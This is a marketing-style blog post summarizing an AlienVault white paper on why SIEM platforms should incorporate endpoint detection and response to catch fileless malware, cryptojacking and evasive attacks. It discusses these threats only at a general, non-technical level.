When we talk about cybersecurity and best practices, we tend to segregate the different branches as if they belong in separate conversations. Endpoint security offers firewalls, port controls, and EDR, as just one example. As another, SIEM provides threat detection, log management, and compliance reporting. The solutions offer separate functions and capabilities and may seem quite unrelated to one another.
However, the distinctions between the two blur their common purpose and obscure the importance of a holistic cybersecurity platform in the enterprise network. Cybersecurity solutions perform optimally when they integrate effectively with each other and utilize their different capabilities. To illustrate, SIEM works best when it incorporates or outright provides endpoint detection and response (EDR), a function typically provided by endpoint security solutions.
Why should SIEM incorporate EDR? What kinds of threats can EDR help prevent or mitigate? How does EDR supplement threat detection? To gain some insight, we read through the “Five Endpoint Attacks Your Antivirus Won’t Catch: A Guide to Endpoint Detection and Response” white paper by SIEM solution provider AlienVault. You can download the white paper for yourself here.
EDR and Threat Detection Begins at the Endpoint
For the uninitiated, endpoint security and SIEM solutions use EDR as a threat detection tool on the endpoint. You can think of it as a safety net; it monitors the endpoint and creates security alerts if a digital threat penetrates the initial preventive security perimeter.
AlienVault notes threats begin at the endpoint, and for good reason; endpoints constitute the primary point of entry into the network, giving hackers a base from which to launch their attacks. EDR helps to secure these endpoints so they don’t give threat actors an advantage in their efforts.
So threat detection can’t begin at the network level. It needs to start at the endpoint. That’s where EDR comes in. But why can’t traditional endpoint security adequately protect against modern threats?
EDR Steps Up Where Traditional EPP Fails
AlienVault cites the Ponemon Institute’s finding that 77% of all reported endpoint compromises in 2017 began with a fileless malware attack. Fileless malware utilizes endpoints’ natural processes rather than downloading a file to perform their malicious functions.
Traditional endpoint security solutions don’t possess the preventative or detection capabilities to handle fileless malware attacks. The same applies to other popular and dangerous modern threats such as cryptojacking malware and remote session jacking attacks; they just do not have the capabilities to recognize these threats and remediate them. Without EDR, modern threats will penetrate and infiltrate your network with relative impunity.
Furthermore, hackers have become more subtle in their attacks and have designed their malware to evade detection. Tactics like lateral movement conceal the threats from traditional endpoint prevention and detection and allow hackers broader access into your network and endpoints.
Endpoint detection and response, on the other hand, can monitor for, detect, and remediate threats like fileless malware and cryptojacking. It can also see through evasive tactics and recognize concealed threats in real time.
EDR in SIEM
EDR should be considered a critical part of your SIEM solution’s threat detection capabilities; you need the extra layer of threat detection on your corporate endpoints to keep them secure and functioning optimally.
To learn more about EDR in SIEM, you can download the “Five Endpoint Attacks Your Antivirus Won’t Catch: A Guide to Endpoint Detection and Response” white paper by SIEM solution provider AlienVault.
Latest posts by Ben Canner (see all)
- Micro Focus Officially Acquires Interset for Cybersecurity Expertise - February 15, 2019
- SIEM for the Consumer-Facing Enterprise: The Lowdown - February 14, 2019
- Balbix: Visibility Gaps Weakens Your Enterprise’s Cybersecurity Posture - February 13, 2019